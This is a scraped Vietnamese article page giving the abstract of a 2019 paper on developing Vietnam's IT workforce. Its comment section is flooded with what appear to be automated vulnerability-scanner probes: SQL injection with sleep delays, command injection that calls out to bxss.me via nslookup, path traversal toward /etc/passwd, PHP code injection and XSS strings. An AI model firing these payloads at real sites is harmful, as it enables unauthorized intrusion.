Image

Tác giả

Vũ Quang Kết

Năm xuất bản

08/06/2019

Chuyên mục

Tài liệu CNTT

Mô tả

Cuộc cách mạng công nghệp 4.0 đã và đang mở ra một kỷ nguyên mới với những thành tựu đột phá, làm thay đổi bối cảnh toàn cầu và có tác động to lớn trên mọi lĩnh vực của mỗi quốc gia. Trong cuộc cách mạng này, ngành công nghệ thông tin (CNTT) đóng vai trò then chốt. Đảng và Nhà nước ta đã sớm nhận thức được vai trò của ngành CNTT và chú trọng phát triển ngành này nhằm “đưa Việt Nam sớm trở thành nước mạnh về công nghệ thông tin và truyền thông”. Muốn phát triển CNTT thì vấn đề cốt yếu quyết định là phải phát triển nguồn nhân lực cho ngành này. Nguồn nhân lực CNTT của Việt Nam trong thời gian qua mặc dù đã đạt được những bước phát triển đáng kể, song vẫn đang tồn tại nhiều yếu điểm cơ bản cần sớm khắc phục. Bài viết này tập trung phân tích thực trạng nguồn nhân lực  đề xuất giải pháp nhằm phát triển nguồn nhân lực ngành CNTT Việt Nam.

Từ khóa: Nguồn nhân lực, Ngành công nghệ thông tin Việt Nam, Cách mạng Công nghiệp 4.0

admin_img

Người đăng

Vũ Quang Kết

Là giảng viên tại Học viện Công nghệ Bưu chính Viễn thông, nhận học vị Tiến sĩ chuyên ngành Kinh tế Quốc tế tại Đại học Quốc gia Hà Nội; Thạc sỹ chuyên ngành Tài chính năm tại Đại Học New South Wales, Australia, Cử nhân Kinh tế tại Đại Học Kinh tế Quốc dân, Hà nội.
Lĩnh vực nghiên cứu: Tài chính, Kinh tế ICT

Bình luận

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

Trương Hải bằng 01:30 12/09/2021 - Reply

Yes

RDFYjolf 15:42 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:42 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

qZN1SFiP

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

hWmehpu1 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

response.write(9225640*9048729)

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

'+response.write(9225640*9048729)+'

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

"+response.write(9225640*9048729)+"

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

response.write(9429568*9272784) 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

'+response.write(9429568*9272784)+' 15:45 06/09/2022 - Reply

@Trương Hải bằng:

"+response.write(9429568*9272784)+" 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

../../../../../../../../../../../../../../etc/passwd

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

../../../../../../../../../../../../../../windows/win.ini

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

echo gtfqxg$()\ nleodz\nz^xyu||a #' &echo gtfqxg$()\ nleodz\nz^xyu||a #|" &echo gtfqxg$()\ nleodz\nz^xyu||a #

RDFYjolf 15:45 06/09/2022 - Reply

../@Trương Hải bằng:

../../../../../../../../../../../../../../etc/passwd 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

&echo rjwxji$()\ qhputv\nz^xyu||a #' &echo rjwxji$()\ qhputv\nz^xyu||a #|" &echo rjwxji$()\ qhputv\nz^xyu||a #

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

../../../../../../../../../../../../../../windows/win.ini 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

|echo uuhrzi$()\ dgytdr\nz^xyu||a #' |echo uuhrzi$()\ dgytdr\nz^xyu||a #|" |echo uuhrzi$()\ dgytdr\nz^xyu||a #

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

(nslookup hitrlitcjzxne653d9.bxss.me||perl -e "gethostbyname('hitrlitcjzxne653d9.bxss.me')")

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

../RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

$(nslookup hitdzfwwhlnzm03690.bxss.me||perl -e "gethostbyname('hitdzfwwhlnzm03690.bxss.me')")

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

&(nslookup hitkgobuzsxrp64691.bxss.me||perl -e "gethostbyname('hitkgobuzsxrp64691.bxss.me')")&'\"`0&(nslookup hitkgobuzsxrp64691.bxss.me||perl -e "gethostbyname('hitkgobuzsxrp64691.bxss.me')")&`'

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

|(nslookup hitgrqrqvcuukde4dd.bxss.me||perl -e "gethostbyname('hitgrqrqvcuukde4dd.bxss.me')")

RDFYjolf 15:45 06/09/2022 - Reply

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

RDFYjolf 15:45 06/09/2022 - Reply

`(nslookup hitvwhvgkpedva71e8.bxss.me||perl -e "gethostbyname('hitvwhvgkpedva71e8.bxss.me')")`

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

'"

RDFYjolf 15:45 06/09/2022 - Reply

;(nslookup hitkzmevfnjmi572a0.bxss.me||perl -e "gethostbyname('hitkzmevfnjmi572a0.bxss.me')")|(nslookup hitkzmevfnjmi572a0.bxss.me||perl -e "gethostbyname('hitkzmevfnjmi572a0.bxss.me')")&(nslookup hitkzmevfnjmi572a0.bxss.me||perl -e "gethostbyname('hitkzmevfnjmi572a0.bxss.me')")

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

<!--

echo kxyowr$()\ kqigbj\nz^xyu||a #' &echo kxyowr$()\ kqigbj\nz^xyu||a #|" &echo kxyowr$()\ kqigbj\nz^xyu||a # 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

&echo oxbyls$()\ gghdyk\nz^xyu||a #' &echo oxbyls$()\ gghdyk\nz^xyu||a #|" &echo oxbyls$()\ gghdyk\nz^xyu||a # 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

'" 15:45 06/09/2022 - Reply

@Trương Hải bằng:

|echo irrrmc$()\ unbnom\nz^xyu||a #' |echo irrrmc$()\ unbnom\nz^xyu||a #|" |echo irrrmc$()\ unbnom\nz^xyu||a # 15:45 06/09/2022 - Reply

@Trương Hải bằng:

<!-- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

(nslookup hitxgxumdnjda806e9.bxss.me||perl -e "gethostbyname('hitxgxumdnjda806e9.bxss.me')") 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

$(nslookup hitzfkwxtopcofbc4e.bxss.me||perl -e "gethostbyname('hitzfkwxtopcofbc4e.bxss.me')") 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

|(nslookup hitkprlwbvffz177f5.bxss.me||perl -e "gethostbyname('hitkprlwbvffz177f5.bxss.me')") 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

`(nslookup hitwjvyibbnuf19283.bxss.me||perl -e "gethostbyname('hitwjvyibbnuf19283.bxss.me')")` 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng: &n971504=v924866

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf&n937242=v907131 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng: '"()&%<acx><br />

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

'"()&%<acx><br />

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng: %0abcc:009247.83-27672.83.c43f6.19241.2@bxss.me

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng: 9541131

RDFYjolf 15:45 06/09/2022 - Reply

to@example.com>%0d%0abcc:009247.83-27673.83.c43f6.19241.2@bxss.me

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf'"()&%<acx><br /> 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf%0abcc:009247.83-27674.83.c43f6.19241.2@bxss.me 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

/xfs.bxss.me

'"()&%<acx><br /> 15:45 06/09/2022 - Reply

@Trương Hải bằng:

to@example.com>%0d%0abcc:009247.83-27675.83.c43f6.19241.2@bxss.me 15:45 06/09/2022 - Reply

@Trương Hải bằng:

/xfs.bxss.me 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf9588415 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng: <esi:include src="http://bxss.me/rpb.png"/>

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf<esi:include src="http://bxss.me/rpb.png"/> 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

${9999083+9999009}

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

${9999141+9999854} 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

a0RkZ3JZSFk= 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

)

RDFYjolf 15:45 06/09/2022 - Reply

"+"A".concat(70-3).concat(22*4).concat(102).concat(89).concat(101).concat(79)+(require"socket" Socket.gethostbyname("hitzt"+"efqpxqop0e1ab.bxss.me.")[3].to_s)+"

RDFYjolf 15:45 06/09/2022 - Reply

HttP://bxss.me/t/xss.html?%00

RDFYjolf 15:45 06/09/2022 - Reply

!(()&&!|*|*|

RDFYjolf 15:45 06/09/2022 - Reply

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

RDFYjolf 15:45 06/09/2022 - Reply

'+'A'.concat(70-3).concat(22*4).concat(120).concat(84).concat(109).concat(84)+(require'socket' Socket.gethostbyname('hitjq'+'csmynrph7d203.bxss.me.')[3].to_s)+'

RDFYjolf 15:45 06/09/2022 - Reply

1some_inexistent_file_with_long_name%00.jpg

RDFYjolf 15:45 06/09/2022 - Reply

bxss.me/t/xss.html?%00

RDFYjolf 15:45 06/09/2022 - Reply

^(#$!@#$)(()))******

"+"A".concat(70-3).concat(22*4).concat(113).concat(89).concat(106).concat(76)+(require"socket" Socket.gethostbyname("hiteo"+"ktbfpdgs68dde.bxss.me.")[3].to_s)+" 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

Http://bxss.me/t/fit.txt

HttP://bxss.me/t/xss.html?%00 15:45 06/09/2022 - Reply

@Trương Hải bằng:

) 15:45 06/09/2022 - Reply

@Trương Hải bằng:

'+'A'.concat(70-3).concat(22*4).concat(103).concat(73).concat(109).concat(90)+(require'socket' Socket.gethostbyname('hitvy'+'gufqznfp6ee53.bxss.me.')[3].to_s)+' 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

http://bxss.me/t/fit.txt%3F.jpg

!(()&&!|*|*| 15:45 06/09/2022 - Reply

@Trương Hải bằng:

bxss.me/t/xss.html?%00 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

bxss.me

^(#$!@#$)(()))****** 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

1some_inexistent_file_with_long_name%00.jpg 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

Http://bxss.me/t/fit.txt 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

http://bxss.me/t/fit.txt%3F.jpg 15:45 06/09/2022 - Reply

@Trương Hải bằng:

bxss.me 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

'.gethostbyname(lc('hitgd'.'ckryyquxd6ccd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(78).chr(100).chr(79).'

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

".gethostbyname(lc("hitxu"."sithiqbc6c606.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(89).chr(118).chr(68)."

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

'.gethostbyname(lc('hitrc'.'hiicmzbt76941.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(87).chr(112).chr(67).' 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

".gethostbyname(lc("hitax"."pazmfiga006c9.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(86).chr(115).chr(90)." 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

RDFYjolf 15:45 06/09/2022 - Reply

';print(md5(31337));$a='

RDFYjolf 15:45 06/09/2022 - Reply

";print(md5(31337));$a="

RDFYjolf 15:45 06/09/2022 - Reply

${@print(md5(31337))}

RDFYjolf 15:45 06/09/2022 - Reply

${@print(md5(31337))}\

RDFYjolf 15:45 06/09/2022 - Reply

'.print(md5(31337)).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 15:45 06/09/2022 - Reply

@Trương Hải bằng:

';print(md5(31337));$a=' 15:45 06/09/2022 - Reply

@Trương Hải bằng:

";print(md5(31337));$a=" 15:45 06/09/2022 - Reply

@Trương Hải bằng:

${@print(md5(31337))} 15:45 06/09/2022 - Reply

@Trương Hải bằng:

${@print(md5(31337))}\ 15:45 06/09/2022 - Reply

@Trương Hải bằng:

'.print(md5(31337)).' 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

bKJkBada

RDFYjolf 15:45 06/09/2022 - Reply

-1 OR 2+818-818-1=0+0+0+1 --

RDFYjolf 15:45 06/09/2022 - Reply

-1 OR 2+330-330-1=0+0+0+1

RDFYjolf 15:45 06/09/2022 - Reply

-1' OR 2+217-217-1=0+0+0+1 --

RDFYjolf 15:45 06/09/2022 - Reply

-1' OR 2+96-96-1=0+0+0+1 or 'PjQqIfHo'='

RDFYjolf 15:45 06/09/2022 - Reply

-1" OR 2+254-254-1=0+0+0+1 --

RDFYjolf 15:45 06/09/2022 - Reply

if(now()=sysdate(),sleep(15),0)

RDFYjolf 15:45 06/09/2022 - Reply

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

RDFYjolf 15:45 06/09/2022 - Reply

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

RDFYjolf 15:45 06/09/2022 - Reply

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

RDFYjolf 15:45 06/09/2022 - Reply

1 waitfor delay '0:0:15' --

RDFYjolf 15:45 06/09/2022 - Reply

aL3QX5x8'; waitfor delay '0:0:15' --

RDFYjolf 15:45 06/09/2022 - Reply

amr1okjN' OR 953=(SELECT 953 FROM PG_SLEEP(15))--

RDFYjolf 15:45 06/09/2022 - Reply

QXdoXn2v') OR 770=(SELECT 770 FROM PG_SLEEP(15))--

RDFYjolf 15:45 06/09/2022 - Reply

lF7k8XQM')) OR 261=(SELECT 261 FROM PG_SLEEP(15))--

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng: '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

RDFYjolf 15:45 06/09/2022 - Reply

1'"

RDFYjolf 15:45 06/09/2022 - Reply

@@XoLh0

4rRWQoZD 15:45 06/09/2022 - Reply

@Trương Hải bằng:

-1 OR 2+643-643-1=0+0+0+1 -- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

-1 OR 2+17-17-1=0+0+0+1 15:45 06/09/2022 - Reply

@Trương Hải bằng:

-1' OR 2+717-717-1=0+0+0+1 -- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

-1' OR 2+256-256-1=0+0+0+1 or 'zKKZrLTq'=' 15:45 06/09/2022 - Reply

@Trương Hải bằng:

-1" OR 2+518-518-1=0+0+0+1 -- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

if(now()=sysdate(),sleep(15),0) 15:45 06/09/2022 - Reply

@Trương Hải bằng:

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 15:45 06/09/2022 - Reply

@Trương Hải bằng:

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 15:45 06/09/2022 - Reply

@Trương Hải bằng:

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 15:45 06/09/2022 - Reply

@Trương Hải bằng:

1 waitfor delay '0:0:15' -- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

5bX3ZA4X'; waitfor delay '0:0:15' -- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

TcHpu8ni' OR 572=(SELECT 572 FROM PG_SLEEP(15))-- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

sVYImz00') OR 805=(SELECT 805 FROM PG_SLEEP(15))-- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

9kNlWv9S')) OR 744=(SELECT 744 FROM PG_SLEEP(15))-- 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 15:45 06/09/2022 - Reply

@Trương Hải bằng:

1'" 15:45 06/09/2022 - Reply

@Trương Hải bằng:

@@tezVS 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:45 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:46 06/09/2022 - Reply

@Trương Hải bằng:

RDFYjolf 15:56 06/09/2022 - Reply

@RDFYjolf:

RDFYjolf 15:56 06/09/2022 - Reply

@RDFYjolf:

RDFYjolf 15:58 06/09/2022 - Reply

@RDFYjolf:

RDFYjolf 17:19 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

response.write(9357752*9392893)

RDFYjolf 17:20 06/09/2022 - Reply

'+response.write(9357752*9392893)+'

RDFYjolf 17:20 06/09/2022 - Reply

"+response.write(9357752*9392893)+"

response.write(9903970*9507769) 17:20 06/09/2022 - Reply

@4rRWQoZD:

'+response.write(9903970*9507769)+' 17:20 06/09/2022 - Reply

@4rRWQoZD:

"+response.write(9903970*9507769)+" 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

echo skfjwg$()\ szqpam\nz^xyu||a #' &echo skfjwg$()\ szqpam\nz^xyu||a #|" &echo skfjwg$()\ szqpam\nz^xyu||a #

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

&echo bvstze$()\ woxlcl\nz^xyu||a #' &echo bvstze$()\ woxlcl\nz^xyu||a #|" &echo bvstze$()\ woxlcl\nz^xyu||a #

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

